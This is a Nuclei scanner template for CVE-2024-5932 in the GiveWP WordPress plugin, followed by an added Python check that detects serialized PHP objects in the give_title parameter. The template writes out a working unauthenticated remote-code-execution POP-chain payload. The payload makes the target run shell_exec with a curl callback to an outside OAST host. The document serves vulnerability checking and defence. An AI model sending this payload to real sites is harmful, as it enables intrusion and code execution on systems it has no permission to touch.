Vulnerability Description
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.
id: CVE-2024-5932

info:
  name: GiveWP - PHP Object Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter.
  impact: |
    This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
  remediation: Fixed in 3.14.2.
  reference:
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/includes/login-register.php#L235
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/includes/process-donation.php#L420
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/src/DonorDashboards/Tabs/EditProfileTab/AvatarRoute.php#L51
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/vendor/tecnickcom/tcpdf/tcpdf.php#L7861
    - https://plugins.trac.wordpress.org/browser/give/tags/3.12.0/vendor/vendor-prefixed/fakerphp/faker/src/Faker/ValidGenerator.php#L80
    - https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932/
    - https://thehackernews.com/2024/08/givewp-wordpress-plugin-vulnerability.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5932
    cwe-id: CWE-502
    epss-score: 0.94018
    epss-percentile: 0.9989
    cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: givewp
    product: givewp
    framework: wordpress
    publicwww-query: "/wp-content/plugins/give/"
  tags: cve,cve2024,rce,wp,wp-plugin,wordpress,oast,givewp,vkev

flow: http(1) && http(2) && http(3)

variables:
  oast: "{{interactsh-url}}"
  len_payload: "{{ len(oast) + 5 }}"
  payload: 'O:19:"Stripe\\\\StripeObject":1:{s:7:"_values";a:1:{i:0;O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:9:"container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:9:"generator";O:24:"Give\\\\Container\\\\Container":1:{s:9:"instances";a:1:{s:8:"address1";s:{{len_payload}}:"curl {{oast}}";}}s:10:"maxRetries";i:1;s:9:"validator";s:10:"shell_exec";}}}}}}'
  email: "{{to_lower(rand_text_alpha(8))}}@gmail.com"
  firstname: "{{to_lower(rand_text_alpha(5))}}"
  lastname: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        GET /wp-json/wp/v2/give_forms/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '"type":'
          - '"guid":'
        condition: and
        internal: true

    extractors:
      - type: json
        part: body
        name: value
        internal: true
        json:
          - '.[0].slug'

      - type: json
        part: body
        name: give-form-title
        internal: true
        json:
          - '.[0].title.rendered'

      - type: json
        part: body
        name: links
        internal: true
        json:
          - '.[0].link'

  - raw:
      - |
        GET /give/{{value}}?giveDonationFormInIframe=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'give-form-hash'
          - 'give-form-id-prefix'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: give-form-hash
        internal: true
        regex:
          - 'name="give\-form\-hash" value="([0-9a-z]+)"'

      - type: regex
        part: body
        group: 1
        name: give-form-id-prefix
        internal: true
        regex:
          - 'name="give\-form\-id\-prefix" value="([0-9-]+)"'

      - type: regex
        part: body
        group: 1
        name: give-form-id
        internal: true
        regex:
          - 'name="give\-form\-id" value="([0-9]+)"'

      - type: regex
        part: body
        group: 1
        name: give-amount
        internal: true
        regex:
          - 'give\-form\-minimum"\n\s+value="([0-9.]+)"\/>'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        give-honeypot=&give-form-id-prefix={{give-form-id-prefix}}&give-form-id={{give-form-id}}&give-form-title={{give-form-title}}&give-current-url={{links}}&give-form-url={{RootURL}}&give-form-minimum={{give-amount}}&give-form-maximum=1000000&give-form-hash={{give-form-hash}}&give-price-id=custom&give-amount={{give-amount}}&give_first={{firstname}}&give_last={{lastname}}&give_email={{email}}&give_stripe_payment_method=&give-user-id=1&give_action=purchase&give-gateway=manual&give_embed_form=1&action=give_process_donation&&give_title={{payload}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - '"error_data"'
          - '"unknown_error"'
        condition: and
# digest: 4a0a004730450220066f00f0b55ed16e63aa2116c217f34d0c019d9d1eb58dbf13fc0870e1e55b41022100bfb0d8c6dbad667c36d2f1ad1a533cf81c9976e8c8fb0cf9d1589431d5808a69:922c64590222798bb761d5b6d8e72950
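The description above names the sink (the 'give_title' parameter of the give_process_donation request is deserialized), which is also what a defender should watch for while patching to 3.14.2. The following Python check, added here and not part of the template or the GiveWP project, flags give_process_donation POST bodies whose give_title value carries a serialized PHP object; the (path, body) event shape and the sample bodies are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlencode

# Serialized PHP object tokens O:<len>:"<class>" (C: for custom-serialized classes),
# anchored at the value start or after ; or { so objects nested in arrays are caught.
PHP_OBJECT_RE = re.compile(r'(?:^|[;{])[OC]:\d+:"')
PHP_CLASS_RE = re.compile(r'[OC]:\d+:"([^"]+)"')

# Donation parameter GiveWP passed to unserialize() before 3.14.2 (CVE-2024-5932).
WATCHED_PARAMS = ("give_title",)


def inspect_donation_request(path: str, body: str) -> dict:
    """Return a finding when a give_process_donation POST carries a serialized PHP
    object in a watched parameter; an empty dict means nothing suspicious."""
    if not path.startswith("/wp-admin/admin-ajax.php"):
        return {}
    params = parse_qs(body, keep_blank_values=True)  # undoes the form URL-encoding
    if "give_process_donation" not in params.get("action", []):
        return {}
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if PHP_OBJECT_RE.search(value):
                return {"param": name, "classes": PHP_CLASS_RE.findall(value)}
    return {}


def scan_events(events) -> list:
    """Run the check over (path, body) pairs and return the hits with their index."""
    hits = []
    for i, (path, body) in enumerate(events):
        finding = inspect_donation_request(path, body)
        if finding:
            hits.append({"index": i, **finding})
    return hits


# Constructed sample traffic (not real captures): a normal donation, a benign form
# listing, and two requests smuggling serialized objects into give_title.
SAMPLE_EVENTS = [
    ("/wp-admin/admin-ajax.php",
     urlencode({"action": "give_process_donation", "give_title": "Mr"})),
    ("/wp-json/wp/v2/give_forms/", ""),
    ("/wp-admin/admin-ajax.php",
     urlencode({"action": "give_process_donation",
                "give_title": 'O:8:"stdClass":1:{s:3:"foo";s:3:"bar";}'})),
    ("/wp-admin/admin-ajax.php",
     urlencode({"action": "give_process_donation",
                "give_title": 'a:1:{i:0;O:8:"stdClass":0:{}}'})),
]
```

The reported class names are only for triage; any serialized object in this parameter is unexpected, so the check does not need to know the specific gadget chain.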